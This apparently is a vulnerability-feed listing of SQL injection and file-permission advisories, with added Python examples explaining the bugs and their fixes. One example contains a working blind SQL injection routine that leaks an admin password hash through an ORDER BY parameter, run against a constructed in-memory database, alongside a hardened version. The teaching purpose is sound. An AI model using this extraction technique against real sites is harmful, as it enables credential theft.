1985 matches found
CVE-2025-7442
The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to SQL Injection via several parameters in the MJgmgtdeleteclasslimitformember, MJgmgtgetyearlyincomeexpense, MJgmgtgetmonthlyincomeexpense, MJgmgtaddclasslimit, MJgmgtviewmeetingdetail, and MJgmgtcreatemeeting functio...
PT-2025-29866 · Wegia · Wegia
Name of the Vulnerable Software and Affected Versions: WeGIA versions prior to 3.4.5 Description: WeGIA is an open-source web manager focused on the Portuguese language and charitable institutions. A SQL Injection issue exists in the /controle/control.php API endpoint, specifically through the carg...
CVE-2025-53509
Advantech iView contains an argument-injection vulnerability in NetworkServlet.restoreDatabase(), exploitable by an authenticated user with at least user-level privileges. An input parameter can be used directly in a command without sanitization, enabling arbitrary arguments and potentially leadi...
CVE-2025-52459
Advantech iView contains a vulnerability in the NetworkServlet.backupDatabase() function where certain parameters can be injected into commands due to improper sanitization. An authenticated attacker with user-level privileges could inject arbitrary arguments, potentially leading to information d...
CVE-2025-6970
The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the...
CVE-2025-34084
...
WordPress ads pro SQL Injection Vulnerability
WordPress Ads Pro is a multi-purpose ad management plugin, mainly used for flexible management of ad space in WordPress websites, supporting banner ad display, billing mode settings and user-friendly ad placement solutions. WordPress ads pro suffers from a SQL injection vulnerability, which stems...
PT-2025-28465 · Fortinet · Fortianalyzer Cloud +3
Name of the Vulnerable Software and Affected Versions: FortiManager versions 6.4 through 7.6.1 FortiManager Cloud versions 6.4 through 7.4.6 FortiAnalyzer versions 6.4 through 7.6.1 FortiAnalyzer Cloud versions 6.4 through 7.4.6 Description: The issue is related to an Improper Neutralization of...
CVE-2025-6783 GoZen Forms <= 1.1.5 - Unauthenticated SQL Injection via emdedSc()
The GoZen Forms plugin for WordPress is vulnerable to SQL Injection via the 'forms-id' parameter of the emdedSc function in all versions up to, and including, 1.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes...
CVE-2025-6739 WPQuiz <= 0.4.2 - Authenticated (Contributor+) SQL Injection
The WPQuiz plugin for WordPress is vulnerable to SQL Injection via the 'id' attribute of the 'wpquiz' shortcode in all versions up to, and including, 0.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it...
PT-2025-27908 · Unknown · Simple Link Directory
Name of the Vulnerable Software and Affected Versions: Simple Link Directory versions n/a through 14.7.3 Description: The issue is related to an SQL Injection vulnerability, specifically an Improper Neutralization of Special Elements used in an SQL Command. This allows attackers to execute...
CVE-2025-5339 Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= 4.89 - Unauthenticated Time-Based SQL Injection via ‘bsa_pro_id’
The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘bsa_pro_id’ parameter in all versions up to, and including, 4.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on...
PT-2025-27594 · WordPress · The Ads Pro Plugin
Name of the Vulnerable Software and Affected Versions: The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager versions up to, and including, 4.89 Description: The issue allows for SQL Injection via the oid parameter due to insufficient escaping on the user-supplied parameter and lack of...
CVE-2025-53091 WeGIA has Unauthenticated Time-Based Blind SQL Injection in almox Parameter
WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Time-Based Blind SQL Injection vulnerability was discovered in version 3.3.3 via the almox parameter of the /controle/getProdutosPorAlmox.php endpoint. This issue allows any unauthenticated...
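Most of the entries above share one root cause: a request value is concatenated into the SQL text ("insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query"). The example below is added here and is not code from any of the listed projects; it uses an in-memory SQLite database with constructed table names (wp_em_events, wp_users) and a constructed password hash value in place of a real WordPress schema. It shows two parameter kinds the advisories describe: a numeric id such as the GoZen 'forms-id' or Ads Pro 'bsa_pro_id' parameter, which is fixed by binding it as a query parameter (the role $wpdb->prepare() plays in WordPress), and an ORDER BY column such as the Events Manager 'orderby' parameter, which a prepared statement cannot bind and which therefore needs an allow-list. The vulnerable path is exploited blind through the sort order alone, to show that an injection into ORDER BY is a data-exfiltration primitive even though it never changes which rows are returned.

```python
import sqlite3

# Allow-list mapping the user-facing orderby value to a real column name.
# Assumed, illustrative column names; not any plugin's actual schema.
ALLOWED_ORDERBY = {"id": "event_id", "name": "event_name", "start": "event_start_date"}


def make_db():
    """Constructed in-memory database standing in for a WordPress install."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE wp_em_events (event_id INTEGER, event_name TEXT, event_start_date TEXT);
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_em_events VALUES (1, 'Alpha', '2025-01-01'),
                                        (2, 'Beta',  '2025-02-01'),
                                        (3, 'Gamma', '2025-03-01');
        -- constructed hash value, not a real credential
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BsecretHash');
    """)
    return con


def list_events_vulnerable(con, orderby, min_id):
    """The pattern the advisories describe: request values concatenated straight
    into the SQL text, with no escaping and no prepared statement."""
    sql = ("SELECT event_id FROM wp_em_events WHERE event_id > " + min_id
           + " ORDER BY " + orderby)
    return [row[0] for row in con.execute(sql)]


def orderby_oracle(con, condition_sql):
    """Boolean-based blind probe through the ORDER BY position: sort ascending
    when the attacker's condition is true, descending when it is false."""
    payload = f"(CASE WHEN ({condition_sql}) THEN event_id ELSE -event_id END)"
    return list_events_vulnerable(con, payload, "0")[0] == 1


def extract_via_orderby(con, column, table, where, length):
    """Recover `length` leading characters of a column value, one probe per
    candidate character, using only the ordering of the result set."""
    charset = "$./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            cond = f"(SELECT substr({column}, {pos}, 1) FROM {table} WHERE {where}) = '{ch}'"
            if orderby_oracle(con, cond):
                recovered += ch
                break
    return recovered


def list_events_safe(con, orderby, min_id):
    """Hardened version: the numeric filter is bound as a parameter (the
    equivalent of $wpdb->prepare()), and the sort column, which cannot be a
    bound parameter, is resolved through the allow-list or rejected."""
    column = ALLOWED_ORDERBY.get(orderby)
    if column is None:
        raise ValueError(f"orderby value not permitted: {orderby!r}")
    sql = f"SELECT event_id FROM wp_em_events WHERE event_id > ? ORDER BY {column}"
    return [row[0] for row in con.execute(sql, (int(min_id),))]


def demo():
    """Returns (hash prefix leaked via ORDER BY, whether the hardened path
    rejected the same payload, hardened result for a legitimate request)."""
    con = make_db()
    leaked = extract_via_orderby(con, "user_pass", "wp_users", "user_login = 'admin'", 6)
    try:
        list_events_safe(con, "(CASE WHEN 1=1 THEN event_id ELSE -event_id END)", "0")
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked, list_events_safe(con, "name", "1")


if __name__ == "__main__":
    print(demo())
```

The time-based variants in the list (Events Manager, Ads Pro, WeGIA) use the same idea with a delay function such as MySQL's SLEEP() as the oracle instead of the sort order; SQLite has no such function, which is why this example uses ordering. The fix is the same in both cases: bind every data value, and resolve anything that has to appear as an identifier (column, table, sort direction) through a fixed mapping rather than through escaping.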
GHSA-JJ2R-455P-5GVF filebrowser Sets Insecure File Permissions
Summary The file access permissions for files uploaded to or created from File Browser are never explicitly set by the application. The same is true for the database used by File Browser. On standard servers where the umask configuration has not been hardened before, this makes all the stated fil...
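The File Browser advisory describes a file created with whatever mode the process umask leaves, so its confidentiality depends on host configuration the application never checked. The example below is added here and is not File Browser's code; the file names (upload.bin, filebrowser.db) are constructed stand-ins written into a temporary directory. It contrasts the umask-dependent pattern with one that requests a 0o600 mode at creation and then fchmod()s the open descriptor, so the result holds even with a fully permissive umask and even when the file already existed with looser permissions.

```python
import os
import stat
import tempfile


def file_mode(path):
    """Permission bits of a file as an int, e.g. 0o644."""
    return stat.S_IMODE(os.stat(path).st_mode)


def write_relying_on_umask(path, data, umask=0o022):
    """The advisory's pattern: open() asks for 0o666 and leaves the final mode
    to the process umask. With the common default 0o022 the result is 0o644,
    readable by every local user."""
    previous = os.umask(umask)
    try:
        with open(path, "w") as fh:
            fh.write(data)
    finally:
        os.umask(previous)
    return file_mode(path)


def write_private(path, data, umask=0o000):
    """Hardened: request 0o600 at creation time so there is no window in which
    the file is looser, then fchmod() the open descriptor so the outcome does
    not depend on umask or on the file having existed already (O_CREAT's mode
    is ignored for an existing file). Run under a permissive 0o000 umask to
    show that the explicit mode, not the umask, decides the result."""
    previous = os.umask(umask)
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        try:
            os.fchmod(fd, 0o600)
            os.write(fd, data.encode())
        finally:
            os.close(fd)
    finally:
        os.umask(previous)
    return file_mode(path)


def permission_demo():
    """Returns (mode of the umask-dependent file, mode after re-writing that
    same pre-existing file with the hardened routine, mode of a fresh file
    written with the hardened routine)."""
    with tempfile.TemporaryDirectory() as workdir:
        upload = os.path.join(workdir, "upload.bin")
        loose = write_relying_on_umask(upload, "x")
        fixed = write_private(upload, "x")
        fresh = write_private(os.path.join(workdir, "filebrowser.db"), "x")
    return loose, fixed, fresh


if __name__ == "__main__":
    print([oct(m) for m in permission_demo()])
```

Two caveats for a real server: os.umask() is process-wide, so a long-running multi-threaded service should set it once at startup rather than toggling it per write as this demonstration does, and the directory holding the database needs a restrictive mode too, since a world-readable parent directory lets other users list and open the files it contains.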
PT-2025-27101
Name of the Vulnerable Software and Affected Versions: ThemeMove Amely versions n/a through 3.1.4 Description: The issue is related to an SQL Injection vulnerability due to improper neutralization of special elements used in an SQL command. This allows for SQL Injection attacks. Recommendations:...
SQL Injection Vulnerability in ERP System of Shenzhen Mingyuan Cloud Technology Co.
The ERP system is a comprehensive information management platform that integrates the functions of housing, customers, sales, finance and human resources. The ERP system of Shenzhen Mingyuan Cloud Technology Co., Ltd. suffers from a SQL injection vulnerability, which can be exploited by attackers to...
PT-2025-26217
Name of the Vulnerable Software and Affected Versions: Yirmibes Software MY ERP versions prior to 1.170 Description: The issue is related to an SQL Injection vulnerability due to improper neutralization of special elements used in an SQL command. This allows for SQL Injection attacks. Recommendatio...
PT-2025-25676 · Unknown · Smart Notification
Name of the Vulnerable Software and Affected Versions: Smart Notification versions n/a through 10.3 Description: The issue is related to an SQL Injection vulnerability, specifically a Blind SQL Injection, due to the improper neutralization of special elements used in an SQL command. This allows a...